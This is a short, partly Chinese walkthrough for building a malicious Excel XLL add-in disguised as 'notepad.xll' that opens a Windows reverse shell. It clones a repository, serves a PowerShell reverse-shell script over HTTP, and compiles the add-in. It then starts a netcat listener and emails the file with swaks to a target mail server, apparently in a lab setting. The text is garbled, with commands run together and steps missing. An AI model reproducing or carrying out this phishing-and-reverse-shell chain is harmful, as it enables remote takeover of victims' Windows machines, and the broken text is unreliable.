
xll windows reverse shell
xll Windows 反向 Shell
git clone https://github.com/n3rdh4x0r/xll_windows_reverse_shell.git
revsh.ps1python3 -m http.server 9999
notpadXLL.c 移动到你的 Windows 攻击者机器上,并相应地更新 notpadXLL.c。x64 Native Tools Command Prompt for VS 2022notepad.xllcl.exe /LD notepadXLL.c /link /out:notepad.xll

notepad.xll 移动到你的 Kali 机器上swaks curl -O https://jetmore.org/john/code/swaks/files/swaks-20240103.0/swaks
nc -nlvp 4444
swaks 发送一封附带 notepad.xll 的电子邮件:./swaks --to [email protected] --from [email protected] --server 10.10.11.21 --port 25 --header "Subject: test" --body "test" --attach @notepad.xll
